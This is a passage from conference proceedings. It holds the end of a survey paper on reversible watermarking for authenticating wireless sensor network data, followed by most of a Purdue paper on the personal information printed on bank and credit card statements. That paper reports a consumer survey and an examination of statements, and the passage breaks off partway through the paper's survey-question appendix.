observed that most of the schemes are implemented under the MATLAB environment. The only scheme implemented in a real environment is Ding’s [21] proposed method. As a result, this scheme is more feasible in terms of implementation.
Evaluation and Analysis of Reversible Watermarking Techniques
705
Efficient security in the table is related to some parameters, such as the type of hash functions and accurate calculation of the synchronization points. Also, the probability of collision because of the length of the produced hash cannot be underestimated. Guo et al. [17] and Gao et al. [9] schemes can no longer be secure for using MD5 as they can be simply compromised.
5.3 Resistance Against Attacks Figure 2 shows the number and types of the attacks that each scheme can resist. Taking a look at this figure, it can be clearly shown that among the schemes Ding, et al. [21] can detect and prevent nine types of attacks, after that Guo et al. [17] scheme can resist seven attacks while the schemes proposed by Shi and Xiao [18], Liu, et al. [19], Wang, et al. [6] and Gao et al. [9] more or less have a similar performance in terms of attack detection and prevention.
Attack analysis Tampering & authentication False negative False positive Packet loss
Guo et al.
Data deletion
Xi Shi, Di Xiao
Data modification
Liu et al.
Eavesdropping
Qun Ding, et al.
Data insertion
Guangyong Gao, et al.
Transfer delay Packet replay Selective forwarding Packet forgery 0
1
2
3
4
5
Fig. 2. Comparison of Schemes in Terms of Resistance against Attacks
Overall consideration, the best performance in attack detection and prevention, the feasibility of implementation and time and energy preservation belongs to Ding et al.’s scheme [21]. Moreover, this scheme interferes with time stamps in the watermark generation, which helps to detect time-related manipulations such as replay attacks. The schemes by Wang Chundong, et al. [6] and Chu-Fu Wang, et al. [10] offer less rate of energy consumption, but the performance in terms of attack resistance is not interesting. Liu’s work [19] is innovative compared to the other duo to use histogram restoration in WSN data, but it increases time and energy overhead. Other schemes are more or less similar with approximately the same feedback regarding attack prevention, system security, memory usage and false positive and negative detection.
706
T. K. Araghi et al.
6 Suggestions for Improving Security Performance for the Future Lightweight IoT-Based Design In this section, some tips are suggested according to our observations regarding the influential factors affecting the performance of the secure WSN and IoT-based transmission schemes: • Using watermarking for authenticity and data integrity in designing schemes ensures the least transmission overhead, while reversible watermarking ensures data accuracy. • The length of the hash data is important. The longest length, offers the lowest probability of collision. Do not use the MD5 hash function. • It is recommended to use chain-created hashing values to the next or previous data groups. As a result, tampering can be detectable in the next round of checking in case of a false positive. • When data grouping is necessary, instead of relating the synchronization points to the hash calculation use the data groups with fixed lengths to avoid additional repetitive calculations and save time and energy. • Use random numbers to keep data secret and avoid false positive stemming from wrong calculations of synchronization points and less energy overhead. In order to avoid time-based attacks, such as the replay attack, use both timestamps and data for hashing and watermark generation. It can assure data freshness, so that the old data cannot be injected by the attackers.
7 Conclusion and Future Work Cryptographic methods usually impose heavy computational load and overhead transmission on the sensors with constrained resources. Considering the sensor networks’ limited power and memory, these techniques cannot be suitable for implementation practically. Reversible watermarking techniques not only ensure security but also remove transmission overhead. In this research, we investigated a collection of recent reversible watermarking techniques in WSNs to elaborate on influential factors to improve performance for secure communications and data authentication. These factors are categorized as the ability to withstand attacks, false positive/negative detection, time and energy overhead, etc. Moreover, with elaborating the influential factors, some suggestions to improve the security performance of the IoT applications, such as smart meters based on a lightweight design, are provided in Sect. 6. The summary of these suggestions make use of watermarking techniques joined with cryptographic functions to alleviate the heavy computational burden as well as achieving an appropriate level of robustness against attacks. We believe this work can inspire researchers to design secure methods for data authenticity in other sensitive data integrity applications in IoT, such as smart meters. Future work is to design a secure method in smart meters according to the results and achievements of this research.
Evaluation and Analysis of Reversible Watermarking Techniques
707
References 1. Kore, A., Patil, S.: Cross layered cryptography based secure routing for IoT-enabled smart healthcare system. Wireless Netw. 28(1), 287–301 (2021). https://doi.org/10.1007/s11276021-02850-5 2. Demertzi, V., Demertzis, S., Demertzis, K.: An Overview of Cyber Threats, Attacks, and Countermeasures on the Primary Domains of Smart Cities. arXiv preprint arXiv:2207.04424 (2022) 3. Vani, G., Shariff, N.C., Biradar, R.K.L.: An investigation of secure authentication systems in wireless sensor networks. Int. J. Early Childhood 14, 2022 (2022) 4. Sumathi, A.C., Akila, M., Pérez de Prado, R., Wozniak, M., Divakarachari, P.B.: Dynamic bargain game theory in the internet of things for data trustworthiness. Sensors 21, 7611 (2021) 5. Mo, J., Hu, Z., Shen, W.: A provably secure three-factor authentication protocol based on chebyshev chaotic mapping for wireless sensor network. IEEE Access 10, 12137–12152 (2022) 6. Wang, C., Bai, Y., Mo, X.: Data secure transmission model based on compressed sensing and digital watermarking technology. Wuhan Univ. J. Nat. Sci. 19(6), 505–511 (2014). https:// doi.org/10.1007/s11859-014-1045-x 7. Venkatachalam, C., Suresh, D.: Combinatorial Asymmetric Key Cryptosystem and Hash Based Multifactor Authentication Techniques for Secured Data Communication in WSN (2022) 8. Kumar, S., Singh, B.K., Pundir, S., Joshi, R., Batra, S.: Role of digital watermarking in wireless sensor network. Recent Advances in Computer Science and Communications (Formerly: Recent Patents on Computer Science), vol. 15, pp. 215–228 (2022) 9. Gao, G., Feng, Z., Han, T.: Data authentication for wireless sensor networks with high detection efficiency based on reversible watermarking. Wireless Commun. Mobile Comput. 2021 (2021) 10. Wang, C.-F., Wu, A.-T., Huang, S.-C.: An energy conserving reversible and irreversible digital watermarking hybrid scheme for cluster-based wireless sensor networks. J. Internet Technol. 19, 105–114 (2018) 11. Kabir, F., Qureshi, A., Megıas, D.: A Study on Privacy-Preserving Data Aggregation Techniques for Secure Smart Metering System (2020) 12. Araghi, T.K.: Digital image watermarking and performance analysis of histogram modification based methods. In: Arai, K., Kapoor, S., Bhatia, R. (eds.) SAI 2018. AISC, vol. 858, pp. 631–637. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-01174-1_49 13. Araghi, T.K., Alarood, A.A., Araghi, S.K.: Analysis and evaluation of template based methods against geometric attacks: a survey. In: Saeed, F., Mohammed, F., Al-Nahari, A. (eds.) IRICT 2020. LNDECT, vol. 72, pp. 807–814. Springer, Cham (2021). https://doi.org/10.1007/9783-030-70713-2_73 14. Li, X., Peng, J., Obaidat, M.S., Wu, F., Khan, M.K., Chen, C.: A secure three-factor user authentication protocol with forward secrecy for wireless medical sensor network systems. IEEE Syst. J. 14, 39–50 (2019) 15. Yi, S., Zhou, Y.: Separable and reversible data hiding in encrypted images using parametric binary tree labeling. IEEE Trans. Multimedia 21, 51–64 (2018) 16. Jagadeesh, S., Parida, A.K., Meenakshi, K., Pradhan, S.: Review on difference expansion based reversible watermarking. In: 2022 3rd International Conference for Emerging Technology (INCET), pp. 1–5 (2022) 17. Guo, H., Li, Y., Jajodia, S.: Chaining watermarks for detecting malicious modifications to streaming data. Inf. Sci. 177, 281–298 (2007)
708
T. K. Araghi et al.
18. Shi, X., Xiao, D.: A reversible watermarking authentication scheme for wireless sensor networks. Inf. Sci. 240, 173–183 (2013) 19. Liu, X., Ge, Y., Zhu, Y., Wu, D.: A lightweight integrity authentication scheme based on reversible watermark for wireless body area networks. KSII Trans. Internet Inform. Syst. 8, 4643–4660 (2014) 20. Huang, C.: Wireless sensor networks data processing summary based on compressive sensing. Sens. Transduc. 174, 67 (2014) 21. Ding, Q., Wang, B., Sun, X., Wang, J., Shen, J.: A reversible watermarking scheme based on difference expansion for wireless sensor networks. Int. J. Grid Distrib. Comput. 8, 143–154 (2015) 22. Vadlamudi, S., Islam, A., Hossain, S., Ahmed, A.A.A., Asadullah, A.: Watermarking techniques for royalty accounts in content management websites for IoT image association. Acad. Market. Stud. J. 25, 1–9 (2021) 23. Potlapally, N.R., Ravi, S., Raghunathan, A., Jha, N.K.: Analyzing the energy consumption of security protocols. In: Proceedings of the 2003 International Symposium on Low Power Electronics and Design, 2003. ISLPED 2003, pp. 30–35 (2003) 24. Araghi, T.K., Manaf, A.B.T.A.: Evaluation of digital image watermarking techniques. In: Saeed, F., Gazem, N., Patnaik, S., Saed Balaid, A.S., Mohammed, F. (eds.) IRICT 2017. LNDECT, vol. 5, pp. 361–368. Springer, Cham (2018). https://doi.org/10.1007/978-3-31959427-9_39
Securing Personally Identifiable Information (PII) in Personal Financial Statements George Hamilton, Medina Williams, and Tahir M. Khan(B) Purdue University, West Lafayette, IN 47907, USA {hamil132,will2345,tmkhan}@purdue.edu Abstract. Communications between financial institutions and their customers contain private, sensitive information that could be leveraged to commit fraud. While financial institutions in the United States are required to distribute periodic financial statements, there may be additional information disclosed within than is not required by law. This research addresses gaps in the literature by comparing information required by law, deemed desirable and undesirable by consumers, and observed on existing personal financial statements. Using methods including a consumer preferences and experiences survey and analyzing financial statements, researchers found that some contained sensitive information. With over 50% of respondents receiving statements intended for someone else in the past five years, these occurrences and available information present an opportunity for fraud. This research may be used to deter sophisticated fraudulent activities such as account takeovers and money laundering and as a reference for future policies governing the information required in financial statements. Keywords: Privacy
1
· Security · PII · Financial statement · Fraud
Introduction
Many businesses and organizations treat privacy and security as premium features instead of incorporating these tenets into normal business operations. In the financial services industry, businesses can equate certain postures of privacy and security compliance as equivalent to meeting safe harbor requirements [9]. Safe harbor refers to thresholds that generally meet minimum due diligence requirements, the intent to, or compliance with a law or regulation. In addition, many institutions associate these same minimal compliance levels of privacy and security with reasonable assurance. These fallacies in perspective leave such organizations and businesses’ critical functions susceptible to vulnerabilities, reputation and operational risks, fraud, and monetary losses. Various laws and regulations require banks, credit unions, and other financial services providers to regularly supply information to their customer base to meet regulatory requirements [3]. Periodic statements, usually on a monthly or quarterly basis, are one such mechanism that financial institutions use to c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 709–728, 2023. https://doi.org/10.1007/978-3-031-28073-3_48
710
G. Hamilton et al.
communicate with their client base and maintain accurate records. These “personal” financial statements serve as official accounting of transactions performed by the client (or on their behalf) and recorded by the financial institution. Furthermore, researchers observed that on some personal financial statements, the required information is packaged with supplemental information and offered as an enhanced service thought to add value to their clients. From the client’s perspective, there may be little-to-no distinction between required and supplemental information. Such circumstances follow with questions of preferences and risk tolerances with respect to clients observing this information on their financial institution(s). This paper examines consumer credit card, banking, and investment account statements (also referred to herein as personal financial statements) and queries survey respondents on their preferred manner of receiving this information from their financial institution(s). In addition, researchers utilized the survey to gauge the prevalence of incorrectly delivered physical and electronic personal financial statements as a proxy for potential fraud. The survey also captured participants’ knowledge of personally identifiable information (PII) to see if these baselines align with government regulations or industry best practices. This work adds to the literature in several different ways. By spotlighting how financial institutions process credit card statements, the reader sees how easily PII can be found and used for fraudulent purposes. The credit card statements located in Appendices A.1, A.2, and A.3 show both commonality in the fields of information displayed and the pattern of encoding. The authors used a survey to capture perceptions of PII use on these credit card statements for a view of where the market is going. Armed with this new research, financial institutions, governmental agencies, and related organizations can shape their policies and services appropriately to meet the needs of their customers while protecting their most prized personal information. The following sections include a literature review, discussions on methodology and subsequent study results, and lastly thoughts on future adjacent work. Appendices A.1, A.2, and A.3 show several example credit card statements (critical PII withheld) which are crucial to the motivations of this paper.
2
Review of Relevant Literature
All businesses want to grow their client base by providing the highest level of service or value of products possible. For financial institutions, they provide both – financial products and services for transacting. As with all business-toconsumer (B2C) relationships, a major component of business revolves around customer service and regularly keeping the customer (synonymous with client or member) informed of account status. Aside from customer service reasons, financial institutions under the United States jurisdiction are required by the Gramm-Leach-Bliley Act (GLBA) to provide their customers with certain types of information on a regular and reoccurring basis [4]. In addition, the GLBA requires financial institutions to take measures to secure customer information against unauthorized disclosure [4].
Securing Personally Identifiable Information (PII)
711
Research from Alberchet et al. shows identity theft, a possible outcome of unauthorized disclosure, is extremely costly; specifically, it estimates that each incident of identity theft costs an average of $1,500 and 175 man-hours of time to resolve [1]. In addition, incidents of identity theft are not covered by the Federal Deposit Insurance Corporation (FDIC), National Credit Union Administration (NCUA), or any similar governing agency, meaning financial institutions may have to pay these costs out of pocket [3]. Financial statements required by GLBA are one way in which financial institutions store and transmit information that could subsequently be leveraged for identity theft. Table 1, from the Consumer Protection Financial Bureau (CFPB), illustrates some of the reporting requirements for open-ended lines of credit which include credit cards. Required fields are indicated by , while non-required fields are indicated by . Table 1. Information required by CFPB on monthly financial statements Information
Home-equity based Open-ended credit (not home-equity based)
Previous balance
Transaction types
Balance for computing charges
Amount of finance charge
Credits
Total charges
Periodic rates
Change in terms and penalty rate
Annual percentage rate (APR)
Grace period
Billing error address
Closing date of billing cycle (with account balance)
Repayment disclosures
Due date; Late payment costs
Existing literature shows it is possible for these statements to fall into nefarious hands or become subject to unauthorized disclosure. In 2013, 647 monthly statements were stolen from a third-party service provider used by Standard Chartered Bank [2]. In another incident without malicious intent, the National Australia Bank sent 400 statements to the wrong customers [13]. Figures from the United States Postal Service (USPS) reveal the potential for the theft of physical, personal financial statements (“bank statements”) is very real. The USPS
712
G. Hamilton et al.
did not track mail theft directly through 2020. However, the nearest estimates based on complaints, including but not limited to mail theft, revealed 175,000 reports in 2020 [12]. Bank statements often have more information than typical checks, which can be used for unauthorized access to banking services [11]. Unauthorized disclosure of financial statements not only jeopardizes the reputation of the institution from which they are stolen but may also slow the adoption of new services the institution hopes to deploy. This is especially true of digital services, like online banking. A 2020 study showed customers who are victims of identity theft were less likely to engage in online banking [6]. The same study also showed that a perceived lack of security controls was one of the primary reasons customers in emerging markets did not engage in online banking [6]. A second study from 2016 reinforces the conclusion that victims of identity theft are less likely to engage in online bill pay services [7]. In addition to the security concerns, some customers are simply unhappy with what they perceive as excessive information on their financial statements [8]. According to a 2022 survey, 78% of respondents prefer to bank digitally. Most others prefer to bank in person, at the ATM, or by phone, and less than 5% prefer to do their banking by mail [10]. Supplemental information can be presented to all groups besides mail after additional authentication. Methods for additional authentication include verifying something the customer has (such as their debit card, government ID, or phone), something they know (such as personal details or a password), or a physical characteristic (such as facial shape or fingerprint). Therefore, there is little reason to include this information on physical statements sent in the mail. Authors Kahn and Linares-Zegarra examined the perception of payment security and its effects on consumer decisions [7]. They defined identity theft as the willful transfer, possession, or usage of any name or number that identifies another with the intent of committing, aiding, or abetting a crime. Their study tested the theory that the public shifts to less efficient forms of payment considering two schools of thought. First, that security matters when consumers adopt a payment technique, and second, security is not as important in terms of payment behavior. It is important to note that the latter only examines perceptions of security and does not include specific incidents. The authors find a positive and statistically significant effect from exposure to certain categories of identity theft on the likely adoption of money orders, credit cards, stored value cards, bank account number payments, and online banking bill payments. Additionally, their study determined a positive and statistically significant effect on cash, money orders, and credit cards. Other specific identity theft incidents were associated with decreased usage of checks and online banking bill payments. Overall, the authors found empirical evidence to conclude that identity theft victims tend to opt for payment methods that are not associated with bank account information [7]. Rohmeyer and Bayuk tackle several thought fallacies prevailing within the financial services industry that have implications on security and privacy practices [9]. There are numerous examples where financial industry executives resort to ignorance claims both publicly and privately (i.e. intra-company only) when
Securing Personally Identifiable Information (PII)
713
faced with security-related challenges. They cite the case of the CEO of Heartlands, who after a major breach, mounted a public relations campaign to defer blame for the company’s missteps. Often, industry professionals mistake their adherence to standards and regulations as a safe harbor for meeting best practices and sufficient levels of due diligence. However, this is not the case with several institutional and psychological factors at play. First, there is no agreedupon definition of [cyber] security within the risk management community. Further, companies, executives, and individuals fail to acknowledge the actual risk levels of such events; many believe the chance of an incident hovers at or near zero percent. Yet in practice, prudent risk management practices never assume a zero percent probability of occurrence. Further, individuals are also beholden to flaws in their own assumptions that personal decisions perfectly predict probable outcomes. One such remedy offered is the reduction of vulnerabilities [9]. The assumption of reducing the amount of information presented on financial statements to only what is desired by customers and required by regulations, like GLBA, is one major way in which financial institutions can mitigate the effects of unauthorized disclosures of such personal financial statements. However, there is no set of guidelines that address the minimum information present on financial statements to satisfy customers, adhere to the GLBA, and minimize the risk of identity theft should statements become part of an unauthorized disclosure. This research addresses a gap in the literature by examining these personal financial statements, surveying customers, and reviewing policy to determine which pieces of information are currently included in financial statements, desired by customers, required by GLBA, and are neither nor desired but present additional risk of identity theft. Financial institutions may leverage the results of this research to remove information from their statements that is neither desired by customers nor required by GLBA. This will result in financial statements which do not unnecessarily reveal personal information about customers and reduce the potential attack surface for malicious actors. This may also help financial institutions reduce the resistance of customers in emerging markets to new electronic services, like online banking, driven by a perceived lack of safeguards or other hesitation.
3
Methodology
Researchers created a 23-question survey measuring demographics as well as their experiences and preferences with regard to information disclosure by financial institutions. Researchers created the survey in Qualtrics and distributed the survey using convenience sampling, with IRB approval. The study questions were constructed based on a review of credit card statements similar to those found within Appendices A.1, A.2, and A.3. These statements displayed patterns of information with few details obfuscated if any. Some details displayed on the credit card statements are mandated by regulation (see Table 1).
714
G. Hamilton et al.
The survey questions were used to gauge the boundaries of providing the required information and adequate protection of PII in the event this information falls into the hands of fraudsters. 3.1
Qualifying Questions
To ensure respondents had the experience to respond to the survey effectively, two qualifying questions were asked before respondents were shown the rest of the questions. The first qualifying question determined if the respondent was eighteen (18) years of age or older, to eliminate participation of minors. The second qualifying question asked if the respondent currently possessed an account with a financial institution in the United States. Researchers note the survey was distributed using convenience sampling, as many respondents were current students. While it is unlikely an adult, US citizen would not have an account with any US financial institution, the survey likely included international students who may have accounts with non-US institutions as well as US students who recently turned 18 and may still rely on the accounts of their parents. If the respondent answered “no” to either of the qualifying questions, then they were immediately taken to the end of the survey and were not allowed to answer the remaining questions. The exact wording of the qualifying questions as well as the full set of questions and possible responses can be found in Appendix A.4. 3.2
Survey Contents
To identify relationships between demographic traits and responses to other questions about preferences and experiences, researchers included demographic questions to measure the following attributes of the survey respondents: – Gender
– Ethnicity
– Age
– Education Level
This research included questions about the preferences of survey respondents. The following areas were covered by the preference questions: – Preferences between electronic and physical statements. – Opinions regarding which pieces of information should and should not be included in statements. – Influence of information disclosure on the choice of financial institutions. – Preferred means of identifying the respondent’s account on a financial statement. Lastly, researchers included questions to measure the past experience of survey respondents. These questions covered the following areas: – Number of financial statements received which were intended for someone else. – Pieces of information observed on financial statements.
Securing Personally Identifiable Information (PII)
715
In addition to the questions which were included in the survey shown in Appendix A.4, several questions were considered for inclusion but eventually discarded. One such question involved the income of respondents. While this question might have provided valuable context to respondents’ other answers, researchers decided the sensitive nature of the question might discourage respondents from completing the survey despite the fact that responses were anonymized. 3.3
Sampling
Researchers distributed the Qualtrics survey using convenience sampling. According to the Encyclopedia of Social Measurement: “Convenience sampling involves using respondents who are convenient to the researcher” [5]. Specifically, the survey was distributed using word of mouth, linkedin.com, facebook.com, surveyswap.io, and university email lists. While convenience sampling in the university environment did cause the survey respondents to skew younger, it also allowed researchers to collect the maximum number of responses.
4 4.1
Results Preferences: Financial Institution
Survey respondents indicated overwhelmingly, approximately 54.3%, that they preferred financial institutions which only provided what respondents deemed as essential information. Of the remaining 45.7% of respondents, 43.3% indicated they had no preference and only 2.4% of the remaining respondents answered they preferred an institution that provides all possible information on financial statements. The 36–40 age group largely indicated they did not have a preference at a rate of 68.8%. Since this age group is composed of older millennials, their seemingly ambivalent preferences may be reflective of their generational attitudes towards convenience with some skepticism. 4.2
Preferences: Information on Statements
Respondents were asked about their preferred method of identifying their account on their personal financial statements. Researchers asked three targeted questions about three options: use of either the full credit card or account number, the last four digits of their credit card or account number, or a four-digit billing identification number. The last option presents a number unrelated to the account number that acts to obfuscate any sensitive account information from plain view while still uniquely identifying the account. 11.2% preferred to see their full credit card number displayed, while approximately 78.9% preferred seeing only the last four digits of their account number identified. Lastly, 64.8% answered they preferred an
716
G. Hamilton et al.
institution to use a four-digit billing ID. These results indicate respondents overwhelmingly prefer an identification method that reduces or completely eliminates information potentially valuable for fraud. Presenting only the last four digits is a step in the direction toward more privacy for the individual account holder, but this still provides some valuable information for an attacker should this information be compromised in some fashion. A four-digit billing ID is the most secure method of protecting this PII from a consumer’s perspective, assuming the financial institution takes reasonable measures to safeguard this information. However, respondents preferred using the last four digits of their credit card or account number. This may have been for easier identification of accounts or because they did not understand the details of the four-digit billing ID, but follow-up questions would be required to be certain. Participants in the survey deemed certain elements of information as criteria that should not be included in statements. One question queried respondents to identify information elements that should never appear on their credit card statements. Possible options included names (surnames, first, and middle), credit score information, related services, and payment and account history. Respondents could select multiple responses. The top three overall items for exclusion were: credit score history (68.8%), current credit score (58.5%), and list of enabled and disabled services (55.5%). These results were consistent in younger survey participants aged 18–25. Additionally, participants in this age group noted “city and state in which the account was opened” and “year in which the account was opened” as factors eligible to be left off statements, at rates of 50.0% and 41.8%, respectively. Older millennials indicated the year information as superfluous as well. From a different perspective, participants seemed to understand the importance of noting a cardholder’s name on statements. “First name” and “last name” were selected least as non-essential information. 4.3
Changing View of PII
The results could be indicative that the public view of personally identifiable information (PII) is changing. For example, consumers may be assuming away full legal names as a necessary level of detail to be included but are instead more sensitive towards features such as city, state, and year of account opening. Additionally, credit scores and score histories are features provided by financial institutions under the guise of added or bonus features to consumers. However, this tactic may be perceived by consumers as divulging unnecessary information and could present additional privacy as well as security risks. Financial institutions should not only adjust their product and service offerings to meet the needs of their clients and customers but also continue to educate them on “the why”. The different “whys” tend to include aspects such as regulatory requirements and proactive security measures [9]. While at first glance some financial institutions appear to truncate some of the personal information
Securing Personally Identifiable Information (PII)
717
related to an individual’s credit card account, it becomes very clear that these details are often embedded in a string of numbers that appear to be intended for reading by an automated system. An example of this encoded information taken from an actual credit card statement, with information modified for privacy, is shown in Fig. 1. This amounts to security through obscurity and is widely considered a flawed practice. As a part of their background research, researchers examined nine personal financial statements from six different institutions. Researchers found that of these nine statements, four contained the full account or credit card number labeled outright on the statement. However, an additional two statements included the full account or credit card number embedded in one of these unlabeled numbers which appeared to come from an automated system. In general, customers may not be aware their full credit card number or account number is present on their statement, as statements examined from Bank of America, PNC, Regions, and Wells Fargo all contained the credit card or account number embedded in the previously mentioned, unlabeled set of numbers. 4.4
Discussion - Information on Statements
The example obfuscated credit statements found in Appendices A.1, A.2, and A.3 show what information is presented to customers in their financial statements. This includes various examples of PII: name, mailing address, etc. Other information pertaining to this open-ended revolving line of credit is included as well: account number, credit limit, available credit, statement due date, minimum payment required, and payment due date. In addition to all of the information described in the example statements, researchers also found additional information in the statements they examined, including the year in which the account was opened, current credit score, credit score history, and routing number. While not every statement provides the same information, much of it is potentially valuable for constructing pretexts and target profiles in social engineering campaigns as well as being directly useful for fraudulent transactions. Appendix A.1 shows an example PNC statement. Customer-related information can be derived from specific areas with very little effort. Fields labeled with the same letter contain the same information, and each occurrence is identified by a unique number. The PNC statement contains: (A) Last 4 Digits of Credit Card Number, (B) Minimum Payment Due, (C) New Balance, (D) Payments Received, (E) Full Credit Card Number, (F) Full Name, and (G) Full Address. The information, while some of it is not clearly labeled by the issuing bank, can be aggregated to gain additional details on the customer. In the case of this statement, information within the payment perforation section is also found within the full statement. Varying levels of information are present within the other statement examples present in Appendices A.2 and A.3. The fictitious Discover Statement in Appendix A.2 has no bar codes and therefore no connection to the series of numbers. Thus a potential adversary cannot figure out the full credit card number. However, some information is still present including new balance, etc. Citibank’s
718
G. Hamilton et al.
Fig. 1. Unlabeled numbers showing: (A) New balance, (B) Minimum payment, and (C) Full credit card number
example statement in Appendix A.3 only displays the last four digits of the credit card number and the full credit card number cannot be inferred. Complying with regulatory requirements also equates to challenges in protecting this information. Statements sent via postal mail encounter various ways and means of compromise. This could be in the form of a consumer’s information being accessed by a trusted insider with affiliation or even being lost in the mail. It is difficult to completely guarantee confidentiality, security, and privacy of the consumer’s information. Even though electronic means are thought to be more secure, there are challenges from the financial institution’s perspective and from the consumer’s. These survey results reinforce the potential for unauthorized access to personal financial statements [12]. Results showed 63% of respondents had received at least one personal financial statement intended for someone else through the mail in the past five years, with 8.9% percent of respondents receiving 10 or more.
5
Conclusions
This paper presented a critical analysis of the information found in personal financial statements and its potential for use in fraud. Researchers also conducted a survey to capture consumer preferences, experiences, and understanding of PII. This survey revealed several pieces of information commonly found on personal financial statements that customers prefer to be omitted, including credit score, credit score history, and a list of enabled and disabled services. In addition, the majority of respondents held a preference for financial institutions which only included the minimum necessary information on their financial statements, suggesting a focus on consumer privacy may be beneficial for financial institutions as well as customers. In addition to revealing consumer preferences, survey results also highlighted the potential for unauthorized access to financial statements, with over half of all respondents reporting they received at least one personal financial statement intended for someone else in the past five years. Lastly, researchers found respondents held inconsistent definitions of PII, suggesting further education of consumers may be beneficial.
Securing Personally Identifiable Information (PII)
719
There are other potential vulnerabilities worth considering further resulting from this study. First, when non-essential information is disclosed by a financial institution, nefarious actors can potentially utilize this to access accounts through other means. One method is to create fraudulent credit cards in the name of the victim using information derived or directly from the credit card statement. Another method is to initiate a fraudulent transfer to a separate account using just a few pieces of details found within most statements and using the internet for source information. Second, third-party vendors and insiders have access to privileged information being in positions of trust. As such, these organizations must constantly be on-guard for unauthorized disclosure via third-party partners. Encoding is another tactic to mitigate against unauthorized use of the customer’s account or information. With encoding, information that is easily deciphered by the most now becomes details that only a machine or computer can read. This creates an additional barrier to security, not to mention an extra layer of due diligence. Based on this sampling of personal financial statements, researchers make the following recommendations. First, personal financial statements can convey this information using a uniform template that could utilize bar codes or QR codes instead of a series of numbers. Second, some of the information displayed on the statements is possibly used as a convenience to the institutions. Given the relative ease potential hackers can harvest customer PII and connect details together, financial institutions should reevaluate these practices and consider other techniques that preserve customer information and details while allowing for operational efficiency.
6
Discussions on Future Work
Future research should seek to strengthen or challenge the conclusions with a similar study conducted over a larger sample size. Additionally, researchers should seek to include a more even distribution of participants across demographics to identify additional correlations between demographics and preferences related to the use of personal information in financial documents. Other efforts should also further explore the relationship between consumer behavior and preferences related to privacy and security. Lastly, the information gathered in this study can assist with building a framework for which items should and should not be included in financial statements based on consumer preferences, regulations, and the potential misuse of the information for fraud.
720
G. Hamilton et al.
A
Appendix
A.1
Example Statement: Full Account Number Obfuscated Only Obfuscated
Fig. 2. Example credit card statement containing - (A) Last 4 digits of credit card number, (B) Minimum payment due, (C) New balance, (D) Payments received, (E) Full credit card number, (F) Full name, and (G) Full address
Securing Personally Identifiable Information (PII)
A.2
721
Example Statement: Last 4 Digits Obfuscated
Fig. 3. Example credit card statement containing - (A) Last 4 digits of credit card number, (B) Minimum payment due, (C) New balance, (D) Payments received, (F) Full name, and (G) Full address
722
G. Hamilton et al.
A.3
Example Statement: No Obfuscated Information
Fig. 4. Example credit card statement containing - (A) Last 4 digits of credit card number, (B) Minimum payment due, (C) New balance, (D) Payments received, (F) Full name, and (G) Full address
A.4
Survey Questions
Note: The original survey was presented to respondents using Qualtrics. However, the questions, available responses, and images have been re-created in the same wording and order in this appendix using LaTeX. Questions that allowed participants to select multiple responses are indicated in this appendix with “(multi-select)” at the end of the question. All questions presented in this appendix that do not end in “(multi-select)” only allowed respondents to select a single response. Responses that allowed respondents to type an answer are indicated in this appendix with “(Text Input)”. Neither of these labels was present in
Securing Personally Identifiable Information (PII)
723
the survey distributed to participants. However, the multi-select questions were indicated to participants using the phrase “Select all that apply” at the end of questions, and the available responses were selected using checkboxes, multiple of which could be selected simultaneously. For questions that only allowed a single response from participants, responses were selected using radio buttons, only one of which could be selected at a time. In the survey presented to participants, responses with text inputs were indicated by a text box which respondents could type into when the response was selected. This paragraph was not included in the survey distributed to participants. 1. Are you at least 18 years of age? – Yes
– No
2. Do you possess a credit card or bank account in the United States? – Yes
– No
3. Would you prefer your account be identified in your credit card or bank statement by the full credit card or bank account number (XXXX-XXXXXXXX-XXXX)? See the image below for an example of a full account number.
– Yes
– No
4. Would you prefer your account be identified in your credit card or bank statement by the last 4 digits of your credit card or bank account number (XXXX)? See the image below for an example of the last 4 digits of a credit card or bank account number.
– Yes
– No
5. Would you prefer your account be identified in your credit card or bank statement by a billing ID that is between 4 and 16 digits unrelated to credit card or bank account number (ZZZZ). See the image below for an example of a 4-digit billing ID. This number can not be used to make purchases, withdrawals, or other transactions with your account. This number is a new identifier proposed by researchers, which is not yet in use.
724
G. Hamilton et al.
– Yes
– No
6. Which of the following pieces of information have you seen on any of your credit card or bank statements before? Select all that apply. (Multi-Select) – Full address – Phone number – Full credit card or bank account number (XXXX-XXXX-XXXXXXXX) – Last 4 digits of credit card or bank account number (XXXX)
– Credit card expiration date – Bank account/credit card account rewards ID – Email address – Other (Text Input) – None of the above
7. In your opinion, which pieces of information should never appear on your statement? Select all that apply. (Multi-Select) – – – –
First name Middle name Last name Year in which the account was opened – Current credit score – Credit score history – List of enabled and disabled services. Including online banking, online bill pay, online statements,
mobile banking, direct deposit, auto pay, and overdraft protection. See the screenshot below for an example list of enabled and disabled services. – Information about payments and transactions made over the past month – Telephone Number – Other (Text Input)
8. In your opinion, what information do you consider essential for your statement? Select all that apply. (Multi-Select)
Securing Personally Identifiable Information (PII)
– – – –
–
– – – –
First name Middle name Last name Full credit card number or bank account number (XXXX-XXXXXXXX-XXXX) Last 4 digits of credit card number or bank account number (XXXX) 4 digit billing ID (See first question on this page for description) Balance and minimum payment information Bank Account/Credit Card Account Rewards ID Information about payments and transactions made over the past month
725
– Year in which the account was opened – City or state in which the account was opened – List of enabled and disabled services. Including online banking, online bill pay, online statements, mobile banking, direct deposit, auto pay, and overdraft protection. (See the previous question for description) – Credit card limit – Available credit – Telephone Number – Other (Text Input)
9. In your opinion, would you prefer to have an account with an institution that provides only information you described as essential in the previous section on its statements? – Disagree: I strongly prefer the institution which provides all possible information on its statements. – Neither agree nor disagree: I have no preference between the institutions. – Agree: I strongly prefer the institution which provides only the information I described as essential in the previous question on its statements. 10. In your opinion, which of the following options can be considered personally identifiable information (PII)? Select all that apply. – Full name (first, last, and middle name) – Birth date (MM-DD-YYYY) – Social security number – Home address (includes street address and home or apartment number) – Year account or credit card was opened – Bank Account/Credit Card Account Rewards ID
– Full credit card number or bank account number (XXXX-XXXXXXXX-XXXX) – Last four digits of credit card number or bank account number (XXXX) – Credit card limit – Credit score – Other (Text Input)
11. How many paper statements have you received which were addressed to another person in the past 5 years?
726
G. Hamilton et al.
– 10+ statements – 6–10 statements
– 2–5 statements – 1 statement
– 0 statements
12. How many electronic statements have you received which were addressed to another person in the past 5 years? – 10+ statements – 6–10 statements
– 2–5 statements – 1 statement
– 0 statements
13. If you have ever received a statement or other document (paper or electronic) addressed to another person, which of the following do you believe you received? Select all that apply. (Multi-Select) – – – – –
